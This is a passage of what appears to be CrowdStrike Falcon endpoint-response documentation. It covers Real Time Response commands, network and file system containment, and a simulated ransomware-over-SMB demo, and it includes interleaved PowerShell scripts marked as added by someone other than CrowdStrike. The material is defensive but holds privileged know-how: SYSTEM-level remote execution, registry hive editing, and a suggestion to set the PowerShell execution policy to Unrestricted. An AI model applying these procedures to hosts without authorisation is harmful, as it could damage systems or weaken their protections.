    The decrypted file is created in the same directory as the source file.

Tips:

You might encounter an error that indicates that the execution policy of the system won’t allow you to run the script:

.\decrypt.ps1 : File C:\Users\Analyst\Desktop\decrypt.ps1 cannot be loaded. The file
C:\Users\Analyst\Desktop\decrypt.ps1 is not digitally signed. You cannot run this script on the current system. For
more information about running scripts and setting execution policy, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\decrypt.ps1
+ ~~~~~~~~~~~~~
+ CategoryInfo          : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess

If you encounter this error, you can do one of the following:

  • Configure the execution policy to a less restrictive mode such as RemoteSigned.

  • Open a PowerShell window with administrative privileges and run the following command: Set-ExecutionPolicy Unrestricted

Reference:

If needed for decryption troubleshooting, the open-source script the encrypt command is based on is available here.

get
  • When you get a file, you can monitor the upload progress in the file upload banner at the top of the RTR window and from the session detail panel. If you navigate away from the RTR window, you can check the progress of requested files from the session summary panel in the RTR audit log (Audit logs > Audit logs > RTR).

    • Upload progress is tracked through a series of file collection and compression stages: upload requested, upload in progress, upload completed, compression started, compression in progress, compress completed.

    • During the upload process, you can view the current stage and its percentage of completion.

    • When the upload process is complete, you can optionally download the file.

    • If an error occurs during upload, a session ID and cloud ID are shown. You can give these numbers to customer support to facilitate error diagnosis and resolution.

  • Files retrieved with the get command are stored in the CrowdStrike cloud for 7 days. You can choose to delete a file sooner from Audit logs > Audit logs > RTR.

  • Files can be downloaded multiple times by any users with the appropriate roles until they expire or are deleted.

  • Files are downloaded as 7-zip archives. Open them with the password infected.

    Note: macOS doesn't natively support 7z. Use Keka to decrypt downloaded files.

  • The maximum file size for get is 4 GB on macOS or Windows, and 2 GB on Linux.

  • You can't get a directory. Run zip first to package the directory into a zipped file.

  • Files are stored securely in the CrowdStrike cloud. Files uploaded using get are stored separately from your other Falcon data, as well as separately from other customers' data, for security purposes.

  • If you end your real time response session while the file is being uploaded to the CrowdStrike cloud, the upload continues. You can retrieve it later from Audit logs > Audit logs > RTR.

  • You can't cancel a file upload.

Getting a file

  1. Connect to the host.

  2. Run ls and cd to navigate through the host's file system.

  3. Run get to upload the file from the host to the CrowdStrike cloud.

  4. When the file has uploaded, click Download in the Real Time Response session to download the file from the CrowdStrike cloud through your browser.

  5. Alternatively, you can download the file within 7 days from Audit logs > Audit logs > RTR. After that time, uploaded files are deleted from the cloud; to download them again, you must run get from another Real Time Response session.

kill

You can't kill processes that are used to run the Falcon sensor.

map
  • Always enclose the password argument in double-quotes.

  • The password argument is not currently obfuscated. We recommend that you create a temporary account on the network share to limit the host’s access through Real Time Response. The cleartext password will be visible in the:

    • Real time response history command

    • Up-arrow recall of the command line interface

  • We recommend you run the unmap command immediately after completing your work on the mapped network share.

  • Only Falcon console users with the RTR Active Responder or RTR Administrator role can access a real time response-mapped network share using the console. Users on the host are not able to access the real time response-mapped network share.

  • Use the mount command to verify that the network share was successfully mapped.

  • Username format:

    • For domain-joined accounts, the username can be in either of the following formats:

      • explicit - “Domain\Username”

      • implicit - “Username”

    • For local accounts, the username must be in the format: “LocalHostName\Username”

memdump

When the memdump file destination is an external storage device (such as a USB drive) and the memory dump is larger than 4GB, the external storage must be formatted in either exFAT or NTFS. FAT32 does not support files larger than 4GB.

mv

If you try to mv a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

netstat

Linux hosts must have netstat installed to run the netstat command using Real Time Response.

put

Note: When using put, we recommend creating a new destination directory for the files and setting permissions so that non-admin users can't modify files there. Otherwise, attackers with a user account could modify the files you sent.

The put command works with the existing list of PUT files uploaded to Host setup and management > Response and containment > Response scripts and files. For more info, see Managing files for the put command.

The default working directory for macOS is /. Starting with macOS 10.15 Catalina, / is read-only. Therefore, put will fail if the current working directory is /. To mitigate this, run the cd command to a writeable directory before executing put.

put only supports putting files into the current working directory. For more info, see Managing files for the put command.

put-and-run

The put-and-run command reduces the potential for user error in file selection by ensuring that the file ‘put’ on the host is the same file that is ‘run’ on the host.

reg

Additional info on reg query

Run reg query with no parameters to see the list of available hives.

For user-specific registry hives, currently loaded user profiles can be found in HKEY_USERS\. Only SIDs are listed, so run the getsid command to map SIDs to usernames.

reg query does not return the PowerShell defaults HKCU or HKLM. HKCU, an alias for HKEY_CURRENT_USER, cannot be used because the current user for real time response is System. HKLM can be used as an alias for convenience.

Additional info on reg set

To create a subkey without creating a value, specify only the first parameter, <Subkey>.

For example, to create only the key:

C:\> reg set HKLM\SOFTWARE\TestKey
Created subkey 'HKLM\SOFTWARE\TestKey'

To create the key with a value:

C:\> reg set HKLM\SOFTWARE\TestKey TestValue -ValueType=REG_SZ -Value=MyStringValue
Created (HKLM\SOFTWARE\TestKey.TestValue) with value 'MyStringValue'

Additional info on reg load and reg unload

Important: Incorrect use of Windows registry commands can cause data loss or unexpected behavior. You should have a strong understanding of the Windows registry before modifying the registry.

For example, modify the registry while a user is logged on:

  1. Run getsid to identify the SID belonging to the user.

  2. Run reg query HKEY_USERS\<SID> to ensure the hive is loaded.

  3. Run reg query, reg set, or reg delete to modify the registry as desired.

Modify the registry while a given user is not logged on:

Run reg load to load the registry hive of a user not currently logged into the host.

  1. Run ls c:\Users to identify the registry file belonging to the target user. The final registry file path is c:\users\<username>\NTUSER.DAT.

  2. Run a command like reg load c:\users\<username>\NTUSER.DAT HKEY_LOCAL_MACHINE\tempkey to load the user hive into a subkey under HKEY_USERS or HKEY_LOCAL_MACHINE.

  3. Run reg query, reg set, or reg delete to modify the registry as desired. For example:

    reg delete HKEY_LOCAL_MACHINE\tempkey\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce MaliciousAutorunKey

  4. Run reg unload HKEY_LOCAL_MACHINE\tempkey to close the key. You must close the key to prevent unexpected behavior the next time the user logs in.
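The two procedures above, done on the host itself with PowerShell and reg.exe, as an added example that is not CrowdStrike's code. It assumes an elevated shell (RTR already runs as SYSTEM), uses the page's HKLM\tempkey mount point, and locates the hive through the ProfileList key rather than by listing C:\Users, which generalizes the page's step to relocated profiles.

```powershell
<#
 Added example, not CrowdStrike's code: the two procedures above done on the host itself with
 PowerShell and reg.exe. Assumptions: an elevated shell (RTR runs as SYSTEM, so the page's
 commands need none); the mount key HKLM\tempkey mirrors the page's example; the account and
 RunOnce value names are supplied by the operator.
#>
param(
    [Parameter(Mandatory)] [string]$UserName,    # 'Domain\User' or a local 'User'
    [Parameter(Mandatory)] [string]$ValueName,   # RunOnce value to remove, e.g. the page's MaliciousAutorunKey
    [string]$MountKey = 'HKLM\tempkey'           # where a not-logged-on user's hive is loaded
)
$runOnceRel = 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'

# Page step "getsid": resolve the account to its SID, since HKEY_USERS lists only SIDs.
$sid = ([System.Security.Principal.NTAccount]$UserName).Translate(
           [System.Security.Principal.SecurityIdentifier]).Value

$loadedHere = $false
if (Test-Path "Registry::HKEY_USERS\$sid") {
    # Logged-on user: the hive is already under HKEY_USERS\<SID> (page: reg query HKEY_USERS\<SID>).
    $hiveRoot = "Registry::HKEY_USERS\$sid"
} else {
    # Not logged on: locate NTUSER.DAT via ProfileList (more reliable than listing C:\Users) and load it.
    $profileEntry = Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$sid" -ErrorAction Stop
    $ntuser = Join-Path $profileEntry.ProfileImagePath 'NTUSER.DAT'
    if (-not (Test-Path $ntuser)) { throw "No hive file at $ntuser" }
    & reg.exe load $MountKey $ntuser | Out-Null                  # page: reg load <path> HKEY_LOCAL_MACHINE\tempkey
    if ($LASTEXITCODE -ne 0) { throw "reg load failed with exit code $LASTEXITCODE" }
    $loadedHere = $true
    $hiveRoot = "Registry::$MountKey"
}

try {
    $runOnce = "$hiveRoot\$runOnceRel"
    if (-not (Test-Path $runOnce)) {
        Write-Output "No RunOnce key in the hive of $UserName ($sid)"
    } else {
        # Record the key's contents before changing anything (same idea as running get before rm).
        $names = (Get-Item $runOnce).GetValueNames()
        Write-Output ("RunOnce values before: " + ($names -join ', '))
        if ($names -contains $ValueName) {
            Remove-ItemProperty -Path $runOnce -Name $ValueName      # page: reg delete ...\RunOnce <name>
            Write-Output "Removed RunOnce value '$ValueName' for $UserName"
        } else {
            Write-Output "RunOnce value '$ValueName' not present for $UserName"
        }
    }
}
finally {
    if ($loadedHere) {
        # Page step "reg unload": release PowerShell's registry handles first, or unload fails with
        # "Access is denied" and the hive stays mounted, which breaks the user's next logon.
        [GC]::Collect(); [GC]::WaitForPendingFinalizers()
        & reg.exe unload $MountKey | Out-Null
        if ($LASTEXITCODE -ne 0) { Write-Warning "reg unload $MountKey failed; close open handles and retry" }
    }
}
```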

rm
  • rm permanently deletes files from the host. Consider running get first if you need a copy of the file for forensic or archival use.

  • You can't rm actively running executables or protected system files, such as anything under C:\windows\system32.

    Attempts to do so produce this error: Access to the path is denied

  • You can't rm files that are used to run the Falcon sensor.

run
Note: When using run, we recommend checking that the file or directory can't be modified by non-admin users. Otherwise, attackers with a user account could replace or modify the files you intend to run.
  • The full file path for the executable is required.

  • The output of executables that write to standard output isn't visible in Real Time Response sessions on Windows hosts.

  • Executables run in the security context of the “LOCAL SYSTEM” account on Windows and as “root” on macOS and Linux. Note that this context is very powerful and highly privileged. Take this into consideration when running programs using the run command.

unmap

Use the mount command to verify that the network share was successfully unmapped.

update

The update command relies on PowerShell and the Windows Update service.

If you need to troubleshoot update actions, find info in your host’s Windows event logs. In Event Viewer, review these logs:

  • Troubleshooting a host that can’t locate Windows Update patches, such as when using update list or update install:

    Applications and Services Logs > Microsoft > Windows > WindowsUpdateClient

  • Troubleshooting a failed installation:

    Applications and Services Logs > Windows PowerShell

When reviewing Windows Update logs, refer to Microsoft’s Windows Update documentation for more info about success and error codes.

xmemdump
  • When xmemdump is executed, it might take a long time to finish running (depending on RAM size). Click Cancel to enable the console to accept new commands, but the memory dump process will continue to run in the background and any subsequent error messaging related to the memory dump won’t appear on screen.

  • If you specify a file path before executing xmemdump, make sure it is not already in use. If the destination file already exists, xmemdump will return an error rather than overwriting the existing file.

  • Make sure there is sufficient free disk space using the mount command before executing xmemdump. The command terminates and returns an error if there is insufficient free disk space on the destination file system.

  • If xmemdump is called while a previous xmemdump command is still running, the newer xmemdump command will return an error message and not run.

  • There are two xmemdump output formats:

    • Complete: Raw memory dump format that can be consumed by third-party memory forensics tools like Volatility.

    • KernelDbg: Crash dump format that can be loaded into any Microsoft debug tool like WinDbg. Limitations:

      • KernelDbg is not supported on:

        • Windows 7

        • Windows 8

        • Windows Server 2008R2

        • Windows Server 2012

      • KernelDbg cannot directly write the memdump to mapped network shares.

  • To use Complete on Windows 10 hosts with a Microsoft hypervisor solution (Memory Integrity/Hypervisor protected Code Integrity), the hosts must use Falcon sensor version 5.29 or later.

  • Complete is not supported on Windows ARM64-based hosts where Hyper-V, Virtualization Based Security (VBS), or Hypervisor-Protected Code Integrity (HVCI) is enabled.

zip

If you try to zip a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

Network Containment

Contain compromised hosts and isolate them from network activity.

If a host has been compromised, you can network contain the host to isolate it from all network activity.
Note: Network containment is not available for ChromeOS hosts.

Requirements

  • Subscriptions:

    • Windows, Mac, Linux: Falcon Insight XDR or Falcon Prevent + Control & Respond

    • Android, iOS: Falcon for Mobile

  • Roles: Falcon Administrator, Falcon Security Lead

  • Sensor: All versions of Falcon sensor for Windows, macOS, and Linux are supported. Linux sensor version 7.06 or later is required for the sensor running in User Mode.

Network containment considerations

  • Falcon Container does not support network containment for pods.

  • The network connections that can be blocked on Android and iOS hosts depend on how the hosts are deployed and configured. For more info, see Network protection.

  • You can automatically network contain Android and iOS hosts if the sensor detects a man-in-the-middle attack. For more info, see Automatic network containment.

Containing a host

To change a host's network containment status, click the network containment option in the host’s summary panel. You can also contain Windows, Mac, and Linux hosts from the detection summary panel.

  • Network Contain: Contain a host.

  • Lift Containment: Restore previous connectivity to a contained host.

  • Lift Containment Pending: The status is in the process of moving from contained to not contained.

  • Containment Pending: The status is in the process of moving from not contained to contained.

Configuring your containment policy

On the Containment policy page, you can allow IP addresses, fully qualified domain names (FQDNs), or domain name system (DNS) servers with which your hosts will always be allowed to communicate, even if a host is contained.
Note: If an Android or iOS host is automatically contained due to a man-in-the-middle attack, the sensor doesn't allow these connections. For more info, see Automatic network containment.
  1. Go to Host setup and management > Response and containment > Containment policy and click Create allowlist.

  2. In Rule type, select one of the following options:
    • IP Range: Enter the IP range that you want to allow to communicate with contained hosts.
    • DNS: Enter the Domain Name System (DNS) server that you want to allow for domain resolution from contained hosts. Supported on Falcon sensor for Windows version 7.33 and later.
    • FQDN: Enter the FQDN that you want contained hosts to be able to access. Optionally, select Allow subdomains if you want to allow subdomains of the FQDN to be accessed by contained hosts as well. Supported on Falcon sensor for Windows version 7.33 and later.
      Note: Selecting Allow subdomains in a policy allowlists one level of subdomains beyond the domain specified in the policy. For example, allowing subdomains for example.com will allow calendar.example.com and mail.example.com, but not my.maps.example.com.
      Important: If you allow subdomains, be aware that some services permit users to register arbitrary subdomains. Due to the recursive nature of DNS resolution, such subdomains resolve to IP addresses controlled by the subdomain owner. In this type of environment, allowing subdomain access could allow DNS resolution to attacker-controlled infrastructure.
  3. Provide a name and click Add allowlist entry.

Note: If you want access to a host after it's contained, CrowdStrike advises that you work with your internal IT/networking team in a test environment to ensure that you allow everything necessary before using the host in production.

Only users with specific roles can manage containment policies. For more info, see Role Management.

Network containment FAQ

Who can change the network containment status of a host?

A user must have the Falcon Administrator role or Falcon Security Lead role to contain a host or remove it from containment. However, all users can see which hosts are contained as well as host-specific containment history using the Hosts App.

What kind of hosts can be network contained?

You can contain any host running the Falcon sensor, regardless of whether the host generated a detect or not.

How does network containment affect a host's connectivity to the CrowdStrike cloud?

When a host is under containment, it can still send and receive information to the CrowdStrike cloud. Using the cloud, you can remediate and remove a host from active containment. A host under containment remains contained even if the connection to the cloud is severed or if the host is rebooted.

Note: If an Android or iOS host is automatically contained due to a man-in-the-middle attack, the sensor is unable to connect to the CrowdStrike cloud due to the ongoing attack. Sensors reconnect to the cloud as soon as a trustworthy network connection can be established. For more info, see Automatic network containment.

How does network containment work at the sensor level?

Upon receiving the Network Containment request, the Falcon sensor blocks all incoming and outgoing network connections to and from the host other than the sensor's connection to the cloud. All existing connections will be terminated, except those that you have allowed using network traffic allowlisting. If the Falcon sensor receives a request to remove a host from containment, the sensor lifts all network restrictions that it previously enforced. Hosts can only be contained and removed from containment one at a time. After containing a host or removing a host from containment, the host's status will change to Pending containment or Lift Containment Pending. Note that if you want access to a host after it's contained, CrowdStrike advises that you work with your internal IT/networking team in a test environment to ensure that you allowed everything necessary before using the machine in production.

Note: If an Android or iOS host is automatically contained due to a man-in-the-middle attack, the sensor doesn't allow these connections. For more info, see Automatic network containment.

What should I consider before using FQDN allowlisting in a network containment policy?

The effectiveness of FQDN allow-listing in network containment depends on the following factors:

  • DNS lookup visibility: Cannot properly function with encrypted DNS protocols (DoH, DoT, DoQ, DoH3) as it depends on clear-text DNS traffic visibility.
  • DNS server trustworthiness: Relies on DNS resolution integrity, which can be compromised by DNS poisoning in non-DNSSEC environments.
  • TLS ClientHello visibility: Unable to distinguish between different domains served from shared IP addresses when TLS handshakes employ encrypted SNI/ECH or omit SNI entirely, limiting domain-specific controls for virtual hosting and CDN environments.

What are the risks of using FQDN allowlisting in a network containment policy?

When you allow-list subdomains, be aware that some services permit users to register arbitrary subdomains. Due to the recursive nature of DNS resolution, these subdomains will resolve to IP addresses controlled by whoever owns that specific subdomain. This could allow DNS resolution to attacker-controlled infrastructure.

For example, allow-listing subdomains for azurewebsites.net or github.io permits the recursive DNS resolution process to traverse through delegation paths ultimately leading to authoritative nameservers controlled by anyone who registers a subdomain, including potential threat actors.
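A model of the one-level "Allow subdomains" rule from the containment policy steps and of the subdomain-registration risk described in this answer, as an added example that is not CrowdStrike's code. The list of suffixes where third parties can register names is constructed from the two names the page mentions; it models only the name-matching rule, not the DNS visibility the sensor also needs.

```powershell
<#
 Added example, not CrowdStrike's code: models the one-level "Allow subdomains" rule from the
 containment policy steps and the FQDN risk described in this FAQ. The list of suffixes under
 which third parties can register names is constructed from the two names the page mentions.
#>
function Test-ContainmentFqdnAllowed {
    param(
        [Parameter(Mandatory)] [string]$QueriedName,  # name a contained host tries to resolve
        [Parameter(Mandatory)] [string]$PolicyFqdn,   # FQDN of the allowlist entry
        [switch]$AllowSubdomains                      # the entry's "Allow subdomains" option
    )
    $q = $QueriedName.TrimEnd('.').ToLowerInvariant()
    $p = $PolicyFqdn.TrimEnd('.').ToLowerInvariant()
    if ($q -eq $p) { return $true }                   # exact match is always allowed
    if (-not $AllowSubdomains) { return $false }
    if (-not $q.EndsWith(".$p")) { return $false }    # must sit strictly below the policy name
    $prefix = $q.Substring(0, $q.Length - $p.Length - 1)
    return -not $prefix.Contains('.')                 # one label only: calendar.example.com, not my.maps.example.com
}

# Suffixes where anyone can register a name beneath the allowlisted domain (constructed list).
$script:UserRegistrableSuffixes = @('azurewebsites.net', 'github.io')

function Get-ContainmentAllowlistWarning {
    param([Parameter(Mandatory)] [string]$PolicyFqdn, [switch]$AllowSubdomains)
    $p = $PolicyFqdn.TrimEnd('.').ToLowerInvariant()
    if ($AllowSubdomains -and $script:UserRegistrableSuffixes -contains $p) {
        return "Allow subdomains on '$p' also admits names registered there by third parties; allow the specific FQDN instead."
    }
}

# Worked run over constructed allowlist entries and lookups.
$entries = @(
    @{ Fqdn = 'example.com';         AllowSubdomains = $true  },
    @{ Fqdn = 'github.io';           AllowSubdomains = $true  },
    @{ Fqdn = 'updates.contoso.com'; AllowSubdomains = $false }
)
$lookups = 'calendar.example.com', 'my.maps.example.com', 'anyone.github.io', 'updates.contoso.com', 'cdn.updates.contoso.com'
foreach ($e in $entries) {
    $sub = [bool]$e.AllowSubdomains
    foreach ($name in $lookups) {
        $allowed = Test-ContainmentFqdnAllowed -QueriedName $name -PolicyFqdn $e.Fqdn -AllowSubdomains:$sub
        '{0,-24} under {1,-20} (subdomains={2,-5}) -> {3}' -f $name, $e.Fqdn, $sub, $allowed
    }
    Get-ContainmentAllowlistWarning -PolicyFqdn $e.Fqdn -AllowSubdomains:$sub | ForEach-Object { Write-Warning $_ }
}
```

Under example.com with subdomains allowed, calendar.example.com resolves as allowed and my.maps.example.com as not; the github.io entry is allowed for anyone.github.io and produces the warning.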

How does FQDN allowlisting work with virtual hosting and content delivery networks (CDNs)?

When using FQDN allowlisting with virtual hosting or CDNs (where multiple domains share the same IP address), the Falcon sensor specifically controls access to the allowed domains only, not all domains hosted on the same IP infrastructure. This ensures that when you allowlist a specific domain, you're not inadvertently granting access to other domains that share the same server or CDN, maintaining containment security even in these complex hosting environments.

What if I'm using a proxy?

The Falcon sensor caches information about what proxy it can connect to. As long as nothing in your network environment or proxy configuration changes, a host that is behind a proxy can be contained and removed from containment. However, if for some reason the network environment or proxy endpoint changes while a host is contained, there is a risk that the host will not be able to discover a new proxy and communicate with the cloud, and will therefore be unable to be removed from containment.

I contained a host but it still has network connectivity. What do I do?

First, check if the status of the host is Containment pending. This status means that the request is still pending. If the status persists, reissue the containment request and wait several minutes. If the status persists after reissuing the request, visit the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, visit the CrowdStrike Government Customer Center for additional assistance.

I removed a host from network containment but it is still contained. What do I do?

First, check if the status of the host is Lift Containment Pending. This status means that the request is still pending. If the status persists, reissue the lift containment request and wait several minutes. If the status persists after reissuing the request, visit the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, visit the CrowdStrike Government Customer Center for additional assistance.

Does network containment work when the sensor is in Reduced Functionality Mode (RFM)?

Network containment is not supported when the Falcon sensor for Linux is in RFM.

Network containment is supported on Windows and macOS hosts running the Falcon sensor in RFM.

File System Containment

Get enhanced protection against adversaries conducting malicious remote file system activity with file system containment.

Overview

Get enhanced protection against adversaries conducting malicious remote file system activity with file system containment. File system containment helps defend against adversaries leveraging compromised credentials, such as ransomware attacks over the Server Message Block (SMB) protocol. When this feature is enabled in prevention policy settings, the Falcon sensor detects the activity and contains the compromised user on the targeted host, preventing the attack.

Requirements

  • Subscription: Falcon Prevent
  • Sensor: Falcon sensor for Windows version 7.21 or later
  • Roles:
    • Falcon Administrator
      • Manage the File system containment prevention policy setting
      • Lift file system containment on a host
    • Security Lead
      • Lift file system containment on a host
  • CrowdStrike clouds: Available in all clouds

Understanding file system containment

When you enable file system containment, the following actions take place:
  • When detecting malicious remote file system activity on the host, the sensor contains the identified remote user account on the host, preventing any destructive file system activity by the compromised user.
  • The user remains contained from destructive remote file system actions until file system containment is lifted.
When you lift file system containment, the following actions take place:
  • The containment lifts for all users on the host.
  • Previously contained users are allowed to perform remote file system actions.

For more info about demoing file system containment in your environment, see Demonstrate File System Containment With a Simulated Ransomware Attack.

Setup

Ensure the File System Containment prevention policy is enabled.

  1. Go to Endpoint security > Configure > Prevention policies.
  2. Select the prevention policy you want to edit.
  3. Go to Malware Protection.
  4. Select File System Containment.

Managing file system containment

Lift file system containment from endpoint detections
  1. Go to Endpoint security > Monitor > Endpoint detections.
  2. Select the detection for the contained host.
  3. From the Actions menu, select Lift file system containment.
Lift file system containment from host management
  1. Go to Host setup and management > Manage endpoints > Host management.
  2. Select the contained host.
  3. From the Open menu select Lift file system containment.
Lift file system containment for all hosts

To lift file system containment for all hosts at once, disable the File System Containment prevention policy setting. Disabling this policy setting lifts file system containment for all hosts that are using that policy.

Note: When you disable the prevention policy setting, the change might take up to 1 hour to apply to all hosts.
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click the name of the prevention policy.
  3. Click Disable policy.

Alternatively, you can lift file system containment for all hosts using CrowdStrike APIs. For more info, see Host and Host Group Management APIs.

Demonstrate File System Containment With a Simulated Ransomware Attack

Simulate a unique non-malicious ransomware attack to demonstrate how file system containment helps defend against adversaries.

Overview

Demonstrate file system containment by simulating a unique non-malicious ransomware attack between two hosts. File system containment helps defend against adversaries leveraging compromised credentials, such as ransomware attacks over the Server Message Block (SMB) protocol. When File system containment is enabled in prevention policy settings, the Falcon sensor detects the activity and contains the compromised user on the targeted host, preventing the attack.

For more info about what file system containment is and how it works, see File System Containment.

Requirements

  • Subscription: Falcon Prevent
  • Sensor: Falcon sensor for Windows version 7.21 and later
  • System Requirements: Windows 10 version 1809 and later, Windows Server 2016 and later
  • Default roles:
    • Falcon Administrator
      • Manage the File system containment prevention policy setting
      • Lift file system containment on a host
    • Security Lead
      • Lift file system containment on a host
  • CrowdStrike clouds: Available in all clouds
  • Other:
    • A remote host running an operating system that supports Server Message Block (SMB)-based file sharing, SMB version 2 or later
    • A network environment that supports Server Message Block (SMB)-based file sharing, SMB version 2 or later

Understanding file system containment

File system containment helps prevent malicious file system level activity on a Windows host. For example, it can provide an additional layer of protection against adversaries that execute ransomware attacks over the Server Message Block (SMB) protocol from a remote host using a compromised user account.

What does file system containment do?

When file system containment is enabled and the sensor detects potentially malicious file system activity initiated by a user, the identified user is prevented from performing any further suspicious file system operations on the host. The user remains unable to perform these operations until file system containment is lifted from Endpoint detections or Host Management in the Falcon console.

Example use case: Ransomware over SMB

File system containment is used for high-fidelity detections that target ransomware attacks over the Server Message Block (SMB) protocol from a remote host.

  1. The sensor detects ransomware file system activity initiated by a remote user over the SMB protocol from a remote host, whether managed or unmanaged.
  2. The identified user account is prevented from performing any further delete, modify, or write file system operations on the local host.
  3. The user remains unable to perform these operations until file system containment is lifted from Endpoint detections or Host Management in the Falcon console.

Setup

Important: Requires complete setup. You must complete all setup steps, including configuring the policy in the Falcon console and preparing test victim and attacker hosts.

Configure file system containment in the Falcon console and prepare 2 hosts to simulate a non-malicious ransomware over SMB attack.

Step 1: Enable file system containment in the Falcon console
  1. Go to Endpoint security > Configure > Prevention policies.
  2. Click Create policy to create a new Windows policy for this test, or edit an existing policy you use for testing or demo activities.
  3. From the prevention policy Settings, go to the Execution blocking section and select File system containment.

    The File system containment prevention policy setting as described in the text.

  4. Click Save.
  5. Add the prevention policy you just created or edited to a host group that contains your test devices. For more info about enabling settings and assigning hosts to prevention policies, see Detection and Prevention Policies.
    Note: You can use a new host group or an existing host group that you use for testing or demo activities.
  6. Optional. Reboot the test endpoints to ensure they get the updated policy settings. If you don't reboot, wait up to 30 minutes for the settings to apply.
Step 2: Prepare a host to simulate a victim

The host has important data stored on an SMB share. Other users with valid account credentials on the same network have access to the data.

  1. Ensure that the host is running Windows 10 version 1809 or later.
  2. Install the Falcon sensor for Windows, version 7.21 or later, if it is not already installed.
  3. Create a test user account, for example, VictimUser1, with a password and network login permissions, if one does not already exist.
  4. Create a test share folder, for example, c:\TestShare, if one does not already exist.
  5. Grant the local test user account, for example, VictimUser1, read, write, and execute permissions to the test share folder.

    Select permissions for the local test user account.

  6. Optional. To simulate a more realistic scenario, place additional test files in the test share folder.
Step 3: Prepare a host to simulate an attacker

The host simulates an attacker that has access to an unmanaged host on your network with a stolen set of user credentials.

  1. Ensure that the attacker host is running Windows 10 version 1809 or later.
  2. Ensure that the Falcon sensor for Windows is not installed.
  3. From File Explorer, map a network drive to the share folder created in the previous section, for example, \\VictimHost\TestShare. For more info, see Microsoft’s documentation about mapping a network drive.
  4. Use the same test user account, for example, VictimUser1, credentials you created for the victim host in the previous section.

    Enter the username and password used for the victim host.

Step 4: Perform a simulated attack

Simulate a ransomware over SMB attack using the attacker host and test user account you configured in previous steps. When the Falcon sensor enacts file system containment on the victim host, applicable events and a detection appear in the Falcon console.

  1. Write a file, with no file extension, named crowdstrike_ransomware_over_smbtest_text_trigger to the share.
  2. In the Falcon console, go to Endpoint security > Monitor > Endpoint detections.
  3. Ensure that a detection appears, with the File system containment status of Contained, as expected.
  4. Select the detection.
  5. From the detection details, see the Host section for info about the remote host, such as IP address and login domain.
  6. Go to Host setup and management > Manage endpoints > Host management.
  7. For the victim host, ensure that File system containment status is Contained.
  8. From the attacker host, verify that you can read files, but can no longer write, execute, or delete files from the share. For example, if you try to delete a file, a File Access Denied or Destination Folder Access Denied error message appears.
Step 5: Lift file system containment
  1. In the Falcon console, go to Host setup and management > Manage endpoints > Host management.
  2. Select the victim host to view Host information.
  3. From the Actions menu, select Lift file system containment.
  4. After a few minutes, use the test account, for example, VictimUser1, on the attacker host. Verify that you can now write, execute, and delete files on the SMB share on the victim host.
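The victim-host preparation from Step 2 and the share access check from Step 4 (item 8) and Step 5 (item 4), scripted as an added example that is not CrowdStrike's code. It assumes the account name, share path and probe file names constructed here; Initialize-FscVictimShare runs elevated on the victim host and Test-FscShareAccess runs on the attacker host as the test user, and the execute check from Step 4 is not probed.

```powershell
<#
 Added example, not CrowdStrike's code: scripts the victim-host preparation in Step 2 and the
 share access check used in Step 4 (item 8) and Step 5 (item 4). Assumptions: the account name,
 share path and probe file names are constructed for this example; Initialize-FscVictimShare runs
 elevated on the victim host; Test-FscShareAccess runs on the attacker host as the test user.
#>
function Initialize-FscVictimShare {
    param(
        [Parameter(Mandatory)] [securestring]$Password,
        [string]$UserName  = 'VictimUser1',     # page's example account name
        [string]$LocalPath = 'C:\TestShare',    # page's example share folder
        [string]$ShareName = 'TestShare'
    )
    if (-not (Get-LocalUser -Name $UserName -ErrorAction SilentlyContinue)) {
        New-LocalUser -Name $UserName -Password $Password -PasswordNeverExpires | Out-Null
    }
    New-Item -ItemType Directory -Path $LocalPath -Force | Out-Null
    # NTFS: read, write, execute (plus Delete, which the demo's delete step needs) for the test account.
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $UserName, 'ReadAndExecute, Write, Delete', 'ContainerInherit, ObjectInherit', 'None', 'Allow')
    $acl = Get-Acl -Path $LocalPath
    $acl.AddAccessRule($rule)
    Set-Acl -Path $LocalPath -AclObject $acl
    # SMB: Change access for the same account, so share permissions do not mask the NTFS ACL.
    if (-not (Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue)) {
        New-SmbShare -Name $ShareName -Path $LocalPath -ChangeAccess $UserName | Out-Null
    }
    # Seed files (Step 2, item 6) so the access check has something to read and delete.
    1..3 | ForEach-Object { Set-Content -Path (Join-Path $LocalPath "document$_.txt") -Value "test data $_" }
    Set-Content -Path (Join-Path $LocalPath 'delete_probe.txt') -Value 'probe'
}

function Test-FscShareAccess {
    param([string]$SharePath = '\\VictimHost\TestShare')   # constructed UNC path
    $r = [ordered]@{ Read = $false; Write = $false; Delete = $false }
    try { Get-Content -Path (Join-Path $SharePath 'document1.txt') -ErrorAction Stop | Out-Null; $r.Read = $true } catch { }
    $probe = Join-Path $SharePath "write_probe_$PID.txt"
    try { Set-Content -Path $probe -Value 'probe' -ErrorAction Stop; $r.Write = $true } catch { }
    try { Remove-Item -Path (Join-Path $SharePath 'delete_probe.txt') -ErrorAction Stop; $r.Delete = $true } catch { }
    if ($r.Delete) { Set-Content -Path (Join-Path $SharePath 'delete_probe.txt') -Value 'probe' }   # re-seed for the next run
    if ($r.Write)  { Remove-Item -Path $probe -ErrorAction SilentlyContinue }
    # Expected: all $true before the trigger file is written; Read only while the user is contained;
    # all $true again a few minutes after containment is lifted.
    [pscustomobject]$r
}
```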

Next steps

After successfully preventing the simulated ransomware over SMB attack, configure file system containment for additional prevention policies. In configuring file system containment, you protect the hosts with the applied policy from similar attacks. For more info, see Setup.

Searching for file system containment events

Using file system containment creates new FileSystemContainmentStatus and FileSystemUncontainmentRequestAll events. For more info about these events, see Events Full Reference (Events Data Dictionary).

To review these events in your environment, execute the following search query from Advanced event search: #event_simpleName = /FileSystemContainment/i OR #event_simpleName = /FileSystemUncontainment/i

Configuration

Detection and Prevention Policies

